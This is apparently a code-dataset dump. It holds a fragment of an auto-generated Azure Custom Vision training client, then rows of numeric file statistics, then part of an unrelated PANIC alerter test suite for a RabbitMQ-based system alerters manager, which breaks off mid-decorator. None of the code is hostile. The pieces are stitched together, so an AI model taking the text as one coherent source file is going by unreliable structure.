self, project_id, tag_id, updated_tag, custom_headers=None, raw=False, **operation_config):
"""Update a tag.
:param project_id: The project id.
:type project_id: str
:param tag_id: The id of the target tag.
:type tag_id: str
:param updated_tag: The updated tag model.
:type updated_tag:
~azure.cognitiveservices.vision.customvision.training.models.Tag
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Tag or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Tag or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.update_tag.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'tagId': self._serialize.url("tag_id", tag_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(updated_tag, 'Tag')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Tag', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
update_tag.metadata = {'url': '/projects/{projectId}/tags/{tagId}'}
def suggest_tags_and_regions(
self, project_id, iteration_id, image_ids, custom_headers=None, raw=False, **operation_config):
"""Suggest tags and regions for an array/batch of untagged images. Returns
empty array if no tags are found.
This API will get suggested tags and regions for an array/batch of
untagged images along with confidences for the tags. It returns an
empty array if no tags are found.
There is a limit of 64 images in the batch.
:param project_id: The project id.
:type project_id: str
:param iteration_id: IterationId to use for tag and region suggestion.
:type iteration_id: str
:param image_ids: Array of image ids tag suggestion are needed for.
Use GetUntaggedImages API to get imageIds.
:type image_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.SuggestedTagAndRegion]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.suggest_tags_and_regions.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
query_parameters['imageIds'] = self._serialize.query("image_ids", image_ids, '[str]', div=',', max_items=64, min_items=0)
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[SuggestedTagAndRegion]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
suggest_tags_and_regions.metadata = {'url': '/projects/{projectId}/tagsandregions/suggestions'}
def train_project(
self, project_id, training_type=None, reserved_budget_in_hours=0, force_train=False, notification_email_address=None, selected_tags=None, custom_headers=None, raw=False, **operation_config):
"""Queues project for training.
:param project_id: The project id.
:type project_id: str
:param training_type: The type of training to use to train the project
(default: Regular). Possible values include: 'Regular', 'Advanced'
:type training_type: str
:param reserved_budget_in_hours: The number of hours reserved as
budget for training (if applicable).
:type reserved_budget_in_hours: int
:param force_train: Whether to force train even if dataset and
configuration does not change (default: false).
:type force_train: bool
:param notification_email_address: The email address to send
notification to when training finishes (default: null).
:type notification_email_address: str
:param selected_tags: List of tags selected for this training session,
other tags in the project will be ignored.
:type selected_tags: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Iteration or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Iteration
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
training_parameters = None
if selected_tags is not None:
training_parameters = models.TrainingParameters(selected_tags=selected_tags)
# Construct URL
url = self.train_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if training_type is not None:
query_parameters['trainingType'] = self._serialize.query("training_type", training_type, 'str')
if reserved_budget_in_hours is not None:
query_parameters['reservedBudgetInHours'] = self._serialize.query("reserved_budget_in_hours", reserved_budget_in_hours, 'int')
if force_train is not None:
query_parameters['forceTrain'] = self._serialize.query("force_train", force_train, 'bool')
if notification_email_address is not None:
query_parameters['notificationEmailAddress'] = self._serialize.query("notification_email_address", notification_email_address, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if training_parameters is not None:
body_content = self._serialize.body(training_parameters, 'TrainingParameters')
else:
body_content = None
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Iteration', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
train_project.metadata = {'url': '/projects/{projectId}/train'}
def import_project(
self, token, custom_headers=None, raw=False, **operation_config):
"""Imports a project.
:param token: Token generated from the export project call.
:type token: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Project or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Project
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.import_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['token'] = self._serialize.query("token", token, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Project', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
import_project.metadata = {'url': '/projects/import'}
| 44.719463
| 202
| 0.670256
| 14,326
| 133,264
| 6.057029
| 0.029387
| 0.026137
| 0.019545
| 0.024339
| 0.90693
| 0.891452
| 0.872737
| 0.860602
| 0.848962
| 0.838567
| 0
| 0.00406
| 0.240433
| 133,264
| 2,979
| 203
| 44.734475
| 0.853186
| 0.358274
| 0
| 0.764973
| 0
| 0
| 0.106029
| 0.02545
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036391
| false
| 0
| 0.003791
| 0
| 0.107657
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9d4e0c96972757314d478f7d31952ce3953c042
| 81,450
|
py
|
Python
|
alerter/test/alerter/managers/test_system.py
|
SimplyVC/panic
|
2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d
|
[
"Apache-2.0"
] | 41
|
2019-08-23T12:40:42.000Z
|
2022-03-28T11:06:02.000Z
|
alerter/test/alerter/managers/test_system.py
|
SimplyVC/panic
|
2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d
|
[
"Apache-2.0"
] | 147
|
2019-08-30T22:09:48.000Z
|
2022-03-30T08:46:26.000Z
|
alerter/test/alerter/managers/test_system.py
|
SimplyVC/panic
|
2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d
|
[
"Apache-2.0"
] | 3
|
2019-09-03T21:12:28.000Z
|
2021-08-18T14:27:56.000Z
|
import copy
import json
import logging
import multiprocessing
import time
import unittest
from datetime import timedelta, datetime
from multiprocessing import Process
from unittest import mock
from unittest.mock import call
import pika
import pika.exceptions
from freezegun import freeze_time
from src.alerter.alerter_starters import start_system_alerter
from src.alerter.alerters.system import SystemAlerter
from src.alerter.alerts.internal_alerts import ComponentResetAlert
from src.alerter.managers.system import SystemAlertersManager
from src.configs.alerts.system import SystemAlertsConfig
from src.message_broker.rabbitmq import RabbitMQApi
from src.utils import env
from src.utils.constants.names import SYSTEM_ALERTER_NAME_TEMPLATE
from src.utils.constants.rabbitmq import (
HEALTH_CHECK_EXCHANGE, CONFIG_EXCHANGE,
SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME,
SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME, PING_ROUTING_KEY,
ALERTS_CONFIGS_ROUTING_KEY_GEN,
HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY, SYSTEM_ALERT_ROUTING_KEY,
ALERT_EXCHANGE, TOPIC)
from src.utils.exceptions import PANICException, MessageWasNotDeliveredException
from test.utils.utils import infinite_fn
# Tests adapted from Monitors managers
class TestSystemAlertersManager(unittest.TestCase):
def setUp(self) -> None:
self.dummy_logger = logging.getLogger('Dummy')
self.dummy_logger.disabled = True
self.connection_check_time_interval = timedelta(seconds=0)
self.rabbitmq = RabbitMQApi(
self.dummy_logger, env.RABBIT_IP,
connection_check_time_interval=self.connection_check_time_interval)
self.manager_name = 'test_system_alerters_manager'
self.test_queue_name = 'Test Queue'
self.test_data_str = 'test data'
self.parent_id_1 = 'test_parent_id_1'
self.parent_id_2 = 'test_parent_id_2'
self.parent_id_3 = 'test_parent_id_3'
self.chain_1 = 'Substrate Polkadot'
self.chain_2 = 'general'
self.chain_3 = 'Cosmos'
self.test_heartbeat = {
'component_name': 'Test Component',
'is_alive': True,
'timestamp': datetime(2012, 1, 1, 1).timestamp(),
}
self.dummy_process1 = Process(target=infinite_fn, args=())
self.dummy_process1.daemon = True
self.dummy_process2 = Process(target=infinite_fn, args=())
self.dummy_process2.daemon = True
self.dummy_process3 = Process(target=infinite_fn, args=())
self.dummy_process3.daemon = True
self.config_process_dict_example = {
self.parent_id_1: {
"component_name": SYSTEM_ALERTER_NAME_TEMPLATE.format(
self.chain_1),
"process": self.dummy_process1,
"chain": self.chain_1
},
self.parent_id_2: {
"component_name": SYSTEM_ALERTER_NAME_TEMPLATE.format(
self.chain_2),
"process": self.dummy_process2,
"chain": self.chain_2
}
}
self.expected_output = {
self.parent_id_1: {
"component_name": SYSTEM_ALERTER_NAME_TEMPLATE.format(
self.chain_1),
"process": self.dummy_process1,
"chain": self.chain_1
},
self.parent_id_2: {
"component_name": SYSTEM_ALERTER_NAME_TEMPLATE.format(
self.chain_2),
"process": self.dummy_process2,
"chain": self.chain_2
}
}
"""
############# Alerts config base configuration ######################
"""
self.enabled_alert = "True"
self.critical_threshold_percentage = 95
self.critical_threshold_seconds = 300
self.critical_repeat_seconds = 300
self.critical_enabled = "True"
self.warning_threshold_percentage = 85
self.warning_threshold_seconds = 200
self.warning_enabled = "True"
# ALERTS CONFIG PARENT_1
self.base_config = {
"name": "base_percent_config",
"enabled": self.enabled_alert,
"parent_id": self.parent_id_1,
"critical_threshold": self.critical_threshold_percentage,
"critical_repeat": self.critical_repeat_seconds,
"critical_enabled": self.critical_enabled,
"warning_threshold": self.warning_threshold_percentage,
"warning_enabled": self.warning_enabled
}
self.open_file_descriptors = copy.deepcopy(self.base_config)
self.open_file_descriptors['name'] = "open_file_descriptors"
self.system_cpu_usage = copy.deepcopy(self.base_config)
self.system_cpu_usage['name'] = "system_cpu_usage"
self.system_storage_usage = copy.deepcopy(self.base_config)
self.system_storage_usage['name'] = "system_storage_usage"
self.system_ram_usage = copy.deepcopy(self.base_config)
self.system_ram_usage['name'] = "system_ram_usage"
self.system_is_down = copy.deepcopy(self.base_config)
self.system_is_down['name'] = "system_is_down"
self.system_is_down['critical_threshold'] = \
self.critical_threshold_seconds
self.system_is_down['warning_threshold'] = \
self.warning_threshold_seconds
self.sent_configs_example = {
1: self.open_file_descriptors,
2: self.system_cpu_usage,
3: self.system_storage_usage,
4: self.system_ram_usage,
5: self.system_is_down
}
self.sent_configs_example_with_default = {
"DEFAULT": {},
"1": self.open_file_descriptors,
"2": self.system_cpu_usage,
"3": self.system_storage_usage,
"4": self.system_ram_usage,
"5": self.system_is_down
}
self.sent_configs_example_with_missing_keys = {
"DEFAULT": {},
"1": self.open_file_descriptors,
"2": self.system_cpu_usage,
"4": self.system_ram_usage,
"5": self.system_is_down
}
# ALERTS CONFIG PARENT_2
self.base_config_2 = {
"name": "base_percent_config",
"enabled": self.enabled_alert,
"parent_id": self.parent_id_2,
"critical_threshold": self.critical_threshold_percentage,
"critical_repeat": self.critical_repeat_seconds,
"critical_enabled": self.critical_enabled,
"warning_threshold": self.warning_threshold_percentage,
"warning_enabled": self.warning_enabled
}
self.open_file_descriptors_2 = copy.deepcopy(self.base_config_2)
self.open_file_descriptors_2['name'] = "open_file_descriptors"
self.system_cpu_usage_2 = copy.deepcopy(self.base_config_2)
self.system_cpu_usage_2['name'] = "system_cpu_usage"
self.system_storage_usage_2 = copy.deepcopy(self.base_config_2)
self.system_storage_usage_2['name'] = "system_storage_usage"
self.system_ram_usage_2 = copy.deepcopy(self.base_config_2)
self.system_ram_usage_2['name'] = "system_ram_usage"
self.system_is_down_2 = copy.deepcopy(self.base_config_2)
self.system_is_down_2['name'] = "system_is_down"
self.system_is_down_2['critical_threshold'] = \
self.critical_threshold_seconds
self.system_is_down_2['warning_threshold'] = \
self.warning_threshold_seconds
self.sent_configs_example_with_default_2 = {
"DEFAULT": {},
"1": self.open_file_descriptors_2,
"2": self.system_cpu_usage_2,
"3": self.system_storage_usage_2,
"4": self.system_ram_usage_2,
"5": self.system_is_down_2
}
self.sent_configs_example_with_default_2_missing_keys = {
"DEFAULT": {},
"1": self.open_file_descriptors_2,
"2": self.system_cpu_usage_2,
"4": self.system_ram_usage_2,
"5": self.system_is_down_2
}
self.system_alerts_config = SystemAlertsConfig(
self.parent_id_1,
self.open_file_descriptors,
self.system_cpu_usage,
self.system_storage_usage,
self.system_ram_usage,
self.system_is_down
)
self.system_alerts_config_2 = SystemAlertsConfig(
self.parent_id_2,
self.open_file_descriptors_2,
self.system_cpu_usage_2,
self.system_storage_usage_2,
self.system_ram_usage_2,
self.system_is_down_2
)
self.test_manager = SystemAlertersManager(
self.dummy_logger, self.manager_name, self.rabbitmq)
self.empty_message = {
"DEFAULT": {}
}
self.chain_example_new = 'Substrate Polkadot'
self.chains_routing_key = 'chains.Substrate.Polkadot.alerts_config'
self.general_routing_key = ALERTS_CONFIGS_ROUTING_KEY_GEN
self.test_exception = PANICException('test_exception', 1)
self.systems_alerts_configs = {}
def tearDown(self) -> None:
# Delete any queues and exchanges which are common across many tests
try:
self.test_manager.rabbitmq.connect()
self.test_manager.rabbitmq.exchange_declare(
HEALTH_CHECK_EXCHANGE, TOPIC, False, True, False, False)
self.test_manager.rabbitmq.exchange_declare(
ALERT_EXCHANGE, TOPIC, False, True, False, False)
self.test_manager.rabbitmq.exchange_declare(
CONFIG_EXCHANGE, TOPIC, False, True, False, False)
# Declare queues incase they haven't been declared already
self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.test_manager.rabbitmq.queue_declare(
queue=SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME, durable=True,
exclusive=False, auto_delete=False, passive=False
)
self.test_manager.rabbitmq.queue_declare(
queue=SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME, durable=True,
exclusive=False, auto_delete=False, passive=False
)
self.test_manager.rabbitmq.queue_purge(self.test_queue_name)
self.test_manager.rabbitmq.queue_purge(
SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME)
self.test_manager.rabbitmq.queue_purge(
SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME)
self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
self.test_manager.rabbitmq.queue_delete(
SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME)
self.test_manager.rabbitmq.queue_delete(
SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME)
self.test_manager.rabbitmq.exchange_delete(HEALTH_CHECK_EXCHANGE)
self.test_manager.rabbitmq.exchange_delete(ALERT_EXCHANGE)
self.test_manager.rabbitmq.exchange_delete(CONFIG_EXCHANGE)
self.test_manager.rabbitmq.disconnect()
except Exception as e:
print("Test failed: {}".format(e))
self.dummy_logger = None
self.rabbitmq = None
self.test_manager = None
self.test_exception = None
self.system_alerts_config = None
self.base_config = None
self.open_file_descriptors = None
self.system_cpu_usage = None
self.system_storage_usage = None
self.system_ram_usage = None
self.system_is_down = None
self.systems_alerts_configs = None
self.dummy_process1 = None
self.dummy_process2 = None
self.dummy_process3 = None
def test_str_returns_manager_name(self) -> None:
self.assertEqual(self.manager_name, self.test_manager.__str__())
def test_name_returns_manager_name(self) -> None:
self.assertEqual(self.manager_name, self.test_manager.name)
def test_systems_configs_returns_systems_configs(self) -> None:
self.test_manager._systems_alerts_configs[self.parent_id_1] = \
self.system_alerts_config
self.assertEqual(self.system_alerts_config,
self.test_manager.systems_alerts_configs[
self.parent_id_1])
@mock.patch.object(RabbitMQApi, "start_consuming")
def test_listen_for_data_calls_start_consuming(
self, mock_start_consuming) -> None:
mock_start_consuming.return_value = None
self.test_manager._listen_for_data()
mock_start_consuming.assert_called_once()
@mock.patch.object(SystemAlertersManager, "_process_ping")
def test_initialise_rabbitmq_initialises_everything_as_expected(
self, mock_process_ping) -> None:
mock_process_ping.return_value = None
try:
# To make sure that there is no connection/channel already
# established
self.assertIsNone(self.rabbitmq.connection)
self.assertIsNone(self.rabbitmq.channel)
# To make sure that the exchanges and queues have not already been
# declared
self.test_manager.rabbitmq.connect()
self.test_manager._initialise_rabbitmq()
# Perform checks that the connection has been opened, marked as open
# and that the delivery confirmation variable is set.
self.assertTrue(self.test_manager.rabbitmq.is_connected)
self.assertTrue(self.test_manager.rabbitmq.connection.is_open)
self.assertTrue(
self.test_manager.rabbitmq.channel._delivery_confirmation)
# Check whether the exchanges and queues have been creating by
# sending messages with the same routing keys as for the queues. We
# will also check if the size of the queues is 0 to confirm that
# basic_consume was called (it will store the msg in the component
# memory immediately). If one of the exchanges or queues is not
# created, then an exception will be thrown. Note when deleting the
# exchanges in the beginning we also released every binding, hence
# there is no other queue binded with the same routing key to any
# exchange at this point.
self.test_manager.rabbitmq.basic_publish_confirm(
exchange=HEALTH_CHECK_EXCHANGE,
routing_key=PING_ROUTING_KEY, body=self.test_data_str,
is_body_dict=False,
properties=pika.BasicProperties(delivery_mode=2),
mandatory=True)
self.test_manager.rabbitmq.basic_publish_confirm(
exchange=CONFIG_EXCHANGE,
routing_key=self.chains_routing_key,
body=self.test_data_str, is_body_dict=False,
properties=pika.BasicProperties(delivery_mode=2),
mandatory=True)
self.test_manager.rabbitmq.basic_publish_confirm(
exchange=CONFIG_EXCHANGE,
routing_key=ALERTS_CONFIGS_ROUTING_KEY_GEN,
body=self.test_data_str, is_body_dict=False,
properties=pika.BasicProperties(delivery_mode=2),
mandatory=True)
self.test_manager.rabbitmq.basic_publish_confirm(
exchange=ALERT_EXCHANGE, routing_key=SYSTEM_ALERT_ROUTING_KEY,
body=self.test_data_str, is_body_dict=False,
properties=pika.BasicProperties(delivery_mode=2),
mandatory=False
)
# Re-declare queue to get the number of messages
res = self.test_manager.rabbitmq.queue_declare(
SYS_ALERTERS_MAN_HEARTBEAT_QUEUE_NAME, False, True, False,
False)
self.assertEqual(0, res.method.message_count)
res = self.test_manager.rabbitmq.queue_declare(
SYS_ALERTERS_MANAGER_CONFIGS_QUEUE_NAME, False, True, False,
False)
self.assertEqual(0, res.method.message_count)
except Exception as e:
self.fail("Test failed: {}".format(e))
def test_send_heartbeat_sends_a_heartbeat_correctly(self) -> None:
# This test creates a queue which receives messages with the same
# routing key as the ones sent by send_heartbeat, and checks that the
# heartbeat is received
try:
self.test_manager._initialise_rabbitmq()
# Delete the queue before to avoid messages in the queue on error.
self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_manager.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
self.test_manager._send_heartbeat(self.test_heartbeat)
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
self.assertEqual(1, res.method.message_count)
# Check that the message received is actually the HB
_, _, body = self.test_manager.rabbitmq.basic_get(
self.test_queue_name)
self.assertEqual(self.test_heartbeat, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(multiprocessing, 'Process')
def test_create_and_start_alerter_process_stores_the_correct_process_info(
self, mock_init, mock_start, mock_push_and_send) -> None:
mock_start.return_value = None
mock_init.return_value = self.dummy_process3
mock_push_and_send.return_value = None
self.test_manager._parent_id_process_dict = \
self.config_process_dict_example
self.expected_output[self.parent_id_3] = {}
new_entry = self.expected_output[self.parent_id_3]
new_entry['component_name'] = SYSTEM_ALERTER_NAME_TEMPLATE.format(
self.chain_3)
new_entry['chain'] = self.chain_3
new_entry['process'] = self.dummy_process3
self.test_manager._create_and_start_alerter_process(
self.system_alerts_config, self.parent_id_3,
self.chain_3)
self.assertEqual(self.expected_output,
self.test_manager.parent_id_process_dict)
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(multiprocessing.Process, "start")
def test_create_and_start_alerter_process_creates_the_correct_process(
self, mock_start, mock_push_and_send) -> None:
mock_start.return_value = None
mock_push_and_send.return_value = None
self.test_manager._create_and_start_alerter_process(
self.system_alerts_config, self.parent_id_3,
self.chain_3)
new_entry = self.test_manager.parent_id_process_dict[self.parent_id_3]
new_entry_process = new_entry['process']
self.assertTrue(new_entry_process.daemon)
self.assertEqual(2, len(new_entry_process._args))
self.assertEqual(self.system_alerts_config, new_entry_process._args[0])
self.assertEqual(self.chain_3, new_entry_process._args[1])
self.assertEqual(start_system_alerter, new_entry_process._target)
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch("src.alerter.alerter_starters.create_logger")
def test_create_and_start_alerter_process_starts_the_process(
self, mock_create_logger, mock_push_and_send, mock_start) -> None:
mock_create_logger.return_value = self.dummy_logger
mock_push_and_send.return_value = None
mock_start.return_value = None
self.test_manager._create_and_start_alerter_process(
self.system_alerts_config, self.parent_id_3,
self.chain_3)
mock_start.assert_called_once()
@freeze_time("2012-01-01")
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch("src.alerter.alerter_starters.create_logger")
def test_create_and_start_alerter_process_sends_a_component_reset_alert(
self, mock_create_logger, mock_push_and_send, mock_start) -> None:
mock_create_logger.return_value = self.dummy_logger
mock_push_and_send.return_value = None
mock_start.return_value = None
self.test_manager._create_and_start_alerter_process(
self.system_alerts_config, self.parent_id_3,
self.chain_3)
test_alert = ComponentResetAlert(
SYSTEM_ALERTER_NAME_TEMPLATE.format(self.chain_3),
datetime.now().timestamp(), SystemAlerter.__name__,
self.parent_id_3, self.chain_3)
mock_push_and_send.assert_called_once_with(test_alert.alert_data)
@mock.patch.object(SystemAlertersManager,
"_create_and_start_alerter_process")
@mock.patch("src.alerter.managers.system.SystemAlertsConfig")
@mock.patch.object(RabbitMQApi, "basic_ack")
def test_process_configs_ignores_default_key(self, mock_ack,
mock_alerts_config,
mock_create_start) -> None:
# This test will pass if the stored systems config does not change.
# This would mean that the DEFAULT key was ignored, otherwise, it would
# have been included as a new config.
mock_create_start.return_value = None
mock_ack.return_value = None
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain = json.dumps(self.sent_configs_example_with_default)
body_general = json.dumps(self.sent_configs_example_with_default)
properties = pika.spec.BasicProperties()
# We will send the message twice with both general and chain
# routing keys to make sure that the DEFAULT key is ignored in both
# cases
self.test_manager._process_configs(blocking_channel, method_general,
properties, body_general)
mock_alerts_config.assert_called_once_with(
parent_id=self.parent_id_1,
open_file_descriptors=self.open_file_descriptors,
system_cpu_usage=self.system_cpu_usage,
system_storage_usage=self.system_storage_usage,
system_ram_usage=self.system_ram_usage,
system_is_down=self.system_is_down
)
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain)
self.assertEqual(2, mock_alerts_config.call_count)
mock_alerts_config.assert_called_with(
parent_id=self.parent_id_1,
open_file_descriptors=self.open_file_descriptors,
system_cpu_usage=self.system_cpu_usage,
system_storage_usage=self.system_storage_usage,
system_ram_usage=self.system_ram_usage,
system_is_down=self.system_is_down
)
except Exception as e:
self.fail("Test failed: {}".format(e))
self.assertEqual(2, mock_ack.call_count)
@mock.patch("src.alerter.managers.system.SystemAlertsConfig")
@mock.patch.object(RabbitMQApi, "basic_ack")
@mock.patch.object(SystemAlertersManager,
"_create_and_start_alerter_process")
def test_process_configs_stores_new_configs_to_be_alerted_correctly(
self, startup_mock, mock_ack, mock_system_alerts_config) -> None:
mock_ack.return_value = None
startup_mock.return_value = None
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
# We will send new configs through both the existing and
# non-existing chain and general paths to make sure that all routes
# work as expected.
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain_initial = json.dumps(
self.sent_configs_example_with_default)
body_general_initial = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain_initial)
call_1 = call(parent_id=self.parent_id_1,
open_file_descriptors=self.open_file_descriptors,
system_cpu_usage=self.system_cpu_usage,
system_storage_usage=self.system_storage_usage,
system_ram_usage=self.system_ram_usage,
system_is_down=self.system_is_down)
mock_system_alerts_config.assert_has_calls([call_1])
self.test_manager._process_configs(blocking_channel, method_general,
properties, body_general_initial)
call_2 = call(parent_id=self.parent_id_2,
open_file_descriptors=self.open_file_descriptors_2,
system_cpu_usage=self.system_cpu_usage_2,
system_storage_usage=self.system_storage_usage_2,
system_ram_usage=self.system_ram_usage_2,
system_is_down=self.system_is_down_2)
mock_system_alerts_config.assert_has_calls([call_2])
self.open_file_descriptors['enabled'] = str(
not bool(self.enabled_alert))
self.open_file_descriptors_2['enabled'] = str(
not bool(self.enabled_alert))
self.sent_configs_example_with_default[
'1'] = self.open_file_descriptors
self.sent_configs_example_with_default_2[
'1'] = self.open_file_descriptors_2
body_new_configs_chain = json.dumps(
self.sent_configs_example_with_default)
body_new_configs_general = json.dumps(
self.sent_configs_example_with_default_2)
self.test_manager._process_configs(blocking_channel, method_chains,
properties,
body_new_configs_chain)
call_3 = call(parent_id=self.parent_id_1,
open_file_descriptors=self.open_file_descriptors,
system_cpu_usage=self.system_cpu_usage,
system_storage_usage=self.system_storage_usage,
system_ram_usage=self.system_ram_usage,
system_is_down=self.system_is_down)
mock_system_alerts_config.assert_has_calls([call_3])
self.test_manager._process_configs(blocking_channel, method_general,
properties,
body_new_configs_general)
call_4 = call(parent_id=self.parent_id_2,
open_file_descriptors=self.open_file_descriptors_2,
system_cpu_usage=self.system_cpu_usage_2,
system_storage_usage=self.system_storage_usage_2,
system_ram_usage=self.system_ram_usage_2,
system_is_down=self.system_is_down_2)
mock_system_alerts_config.assert_has_calls([call_4])
self.assertEqual(4, mock_system_alerts_config.call_count)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch("src.alerter.managers.system.SystemAlertsConfig")
